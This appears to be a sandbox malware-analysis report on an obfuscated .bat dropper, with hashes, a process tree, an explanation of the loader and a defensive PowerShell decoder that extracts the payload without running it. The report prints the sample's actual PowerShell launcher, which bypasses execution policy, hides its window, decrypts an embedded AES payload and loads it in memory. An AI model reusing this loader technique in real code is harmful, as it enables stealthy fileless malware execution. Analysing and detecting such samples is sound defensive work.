Analysis

  • max time kernel
    0s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/01/2024, 20:50

General

  • Target

    310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat

  • Size

    1.6MB

  • MD5

    4fbb5e9e5b5690f1b361f9f67d10e25c

  • SHA1

    b77eeb5b8b08f5dfa427cd078423e4f190a28c41

  • SHA256

    310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3

  • SHA512

    640cac38739d0d0d1ad8f8dac89b444197ce3778d9eebe864e52ff4902f752c0a3971591f787cc67ecadd538cd2668409423403b2fef2928cfcd837b5b98c770

  • SSDEEP

    24576:qK9lTH+TerznENh/hOe4/Vty848E2CYMjGUdaDJG8wxspPFZ4SAIXnp:Ld+TAnEzZpgP48NmzUWM

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
      "310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_EpMhA = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat').Split([Environment]::NewLine);foreach ($_CASH_XmsgQ in $_CASH_EpMhA) { if ($_CASH_XmsgQ.StartsWith(':: @')) { $_CASH_ZQHrQ = $_CASH_XmsgQ.Substring(4); break; }; };$_CASH_ZQHrQ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZQHrQ, '_CASH_', '');$_CASH_SYRjr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZQHrQ);$_CASH_PvKMs = New-Object System.Security.Cryptography.AesManaged;$_CASH_PvKMs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_PvKMs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_PvKMs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6hNp6znpdVtLRa88u+RJyOIAqy0yV+kZzUW8J2gDR2A=');$_CASH_PvKMs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDzuGGfzy2kiH4wwo0D5Gg==');$_CASH_GbaEH = $_CASH_PvKMs.CreateDecryptor();$_CASH_SYRjr = $_CASH_GbaEH.TransformFinalBlock($_CASH_SYRjr, 0, $_CASH_SYRjr.Length);$_CASH_GbaEH.Dispose();$_CASH_PvKMs.Dispose();$_CASH_NifoM = New-Object System.IO.MemoryStream(, $_CASH_SYRjr);$_CASH_AvJfW = New-Object System.IO.MemoryStream;$_CASH_wZAxN = New-Object System.IO.Compression.GZipStream($_CASH_NifoM, [IO.Compression.CompressionMode]::Decompress);$_CASH_wZAxN.CopyTo($_CASH_AvJfW);$_CASH_wZAxN.Dispose();$_CASH_NifoM.Dispose();$_CASH_AvJfW.Dispose();$_CASH_SYRjr = $_CASH_AvJfW.ToArray();$_CASH_VbXeh = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_SYRjr);$_CASH_eGoft = $_CASH_VbXeh.EntryPoint;$_CASH_eGoft.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      PID:3032
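
The child process above is a PowerShell interpreter running under the sample's own name with `.exe` appended (the switches `-noprofile -windowstyle hidden -ep bypass -command` are PowerShell's). The script it is given reads the .bat file itself, takes the first line beginning with `:: @` (a batch comment, so cmd.exe ignores it when running the file), strips every `_CASH_` substring, Base64-decodes the rest, decrypts it with AES in CBC mode and PKCS7 padding using the hard-coded 32-byte key and 16-byte IV, GZip-decompresses the result, and hands the bytes to `Assembly.Load` before invoking the entry point, so the real payload never touches disk as a file. Method names are spelled backwards and reversed at run time (`'txeTllAdaeR'[-1..-11] -join ''` is `ReadAllText`, `'gnirtS46esaBmorF'[-1..-16]` is `FromBase64String`, `'daoL'[-1..-4]` is `Load`) to defeat naive string matching. The script below is an added example, not code from the report or from the sample: it replays the same transform chain statically so the embedded assembly can be recovered for analysis, but it writes the bytes to disk instead of loading them. The key, IV, marker and junk string are copied from the command line above; the parameter names, the output path and the MZ check are this example's own choices, and the decoded assembly is not listed in the report's Downloads, so there is no page hash to compare the result against.

```powershell
<#
  Added example: static decoder for the ":: @" payload carried inside the .bat.
  Repeats the launcher's chain (strip "_CASH_", Base64, AES-CBC/PKCS7, GZip)
  but never calls Assembly.Load. Run it only on an isolated analysis host; the
  output file is the sample's real malicious .NET code.
#>
param(
    [Parameter(Mandatory = $true)][string]$BatPath,
    [string]$OutPath = "$BatPath.decoded.bin",
    # Key (32 bytes) and IV (16 bytes) copied from the launcher command line.
    [string]$KeyB64 = '6hNp6znpdVtLRa88u+RJyOIAqy0yV+kZzUW8J2gDR2A=',
    [string]$IvB64  = 'yDzuGGfzy2kiH4wwo0D5Gg==',
    [string]$Marker = ':: @',
    [string]$Junk   = '_CASH_'
)

# 1. Locate the payload line. The launcher takes the first line that starts
#    with the marker; everything after the marker is the obfuscated ciphertext.
$line = Get-Content -LiteralPath $BatPath |
    Where-Object { $_.StartsWith($Marker) } |
    Select-Object -First 1
if (-not $line) { throw "No line starting with '$Marker' found in $BatPath" }
$b64 = $line.Substring($Marker.Length) -replace [regex]::Escape($Junk), ''

# 2. Base64 -> AES-256-CBC ciphertext. Same mode and padding as the launcher.
$cipherText = [Convert]::FromBase64String($b64)
$aes = New-Object -TypeName System.Security.Cryptography.AesManaged
$aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes.Key     = [Convert]::FromBase64String($KeyB64)
$aes.IV      = [Convert]::FromBase64String($IvB64)
$decryptor = $aes.CreateDecryptor()
try     { $gz = $decryptor.TransformFinalBlock($cipherText, 0, $cipherText.Length) }
finally { $decryptor.Dispose(); $aes.Dispose() }

# 3. GZip-decompress the plaintext to get the raw assembly bytes.
$inStream  = New-Object -TypeName System.IO.MemoryStream -ArgumentList @(,$gz)
$outStream = New-Object -TypeName System.IO.MemoryStream
$gzStream  = New-Object -TypeName System.IO.Compression.GZipStream `
    -ArgumentList $inStream, ([IO.Compression.CompressionMode]::Decompress)
$gzStream.CopyTo($outStream)
$gzStream.Dispose(); $inStream.Dispose()
$payload = $outStream.ToArray()
$outStream.Dispose()

# 4. Sanity check before writing: a PE image (and so a .NET assembly) starts
#    with "MZ". Anything else means the key, IV or marker does not fit this file.
if ($payload.Length -lt 2 -or $payload[0] -ne 0x4D -or $payload[1] -ne 0x5A) {
    throw ("Decoded data is not a PE image (first bytes: {0})" -f ($payload[0..1] -join ','))
}
[IO.File]::WriteAllBytes($OutPath, $payload)
$sha256 = ([BitConverter]::ToString(
    [System.Security.Cryptography.SHA256]::Create().ComputeHash($payload))) -replace '-', ''
Write-Output ("Wrote {0} bytes to {1} (SHA256 {2})" -f $payload.Length, $OutPath, $sha256)
```

Usage: `.\decode-bat-payload.ps1 -BatPath .\310b3a07...cfcbb3.bat`. The output file can then be handed to a .NET decompiler; if the MZ check fails, confirm the marker line was extracted whole (some editors rewrap long lines) before suspecting a different key. The same loader shape, a renamed PowerShell binary reading its own .bat and decrypting a `::`-comment line, is worth hunting for generically: a process whose image path ends in `.bat.exe` with a parent of cmd.exe and `-ep bypass` on the command line does not occur in legitimate administration.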

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe

    Filesize

    7KB

    MD5

    1a55940ea67fa5fc262a46a272504c58

    SHA1

    6f000a45239b343de83ce80f9a3ad0970e9ca010

    SHA256

    0f92483bb3e37523ffb9dd2e62e43974306b66d21ddf9b70c4e8c98f93746e91

    SHA512

    b30f6327104ad5e65f6f6d8b3ac41b927a60a550feb7b8815a6dbc8b46cc2b99519a06f3ba78a9460be8d7ade82b1cde0c3a7e41d2deee91fc6175fc9f7ad639

  • \Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe

    Filesize

    18KB

    MD5

    055e9ad68a7ed922ac8b376c96270622

    SHA1

    bf15d9df06764e9045c65f7136c9b1dbae9e36c4

    SHA256

    57f286509d4a5a66f9d77d54360e6caa39241af533b51f731f7285274877b95a

    SHA512

    841613348027c97221d975f3d62a31ced41ebc96333eee2cefed8c00704975418ef739aeeec9762290236de48f0226ef03a43d3af4e2c4e561fc703684423435

  • memory/3032-7-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

    Filesize

    9.6MB

  • memory/3032-9-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

    Filesize

    9.6MB

  • memory/3032-10-0x0000000002AD0000-0x0000000002B50000-memory.dmp

    Filesize

    512KB

  • memory/3032-12-0x0000000002AD0000-0x0000000002B50000-memory.dmp

    Filesize

    512KB

  • memory/3032-11-0x0000000002AD0000-0x0000000002B50000-memory.dmp

    Filesize

    512KB

  • memory/3032-13-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

    Filesize

    9.6MB

  • memory/3032-8-0x0000000002AD0000-0x0000000002B50000-memory.dmp

    Filesize

    512KB

  • memory/3032-6-0x0000000001D40000-0x0000000001D48000-memory.dmp

    Filesize

    32KB

  • memory/3032-5-0x000000001B330000-0x000000001B612000-memory.dmp

    Filesize

    2.9MB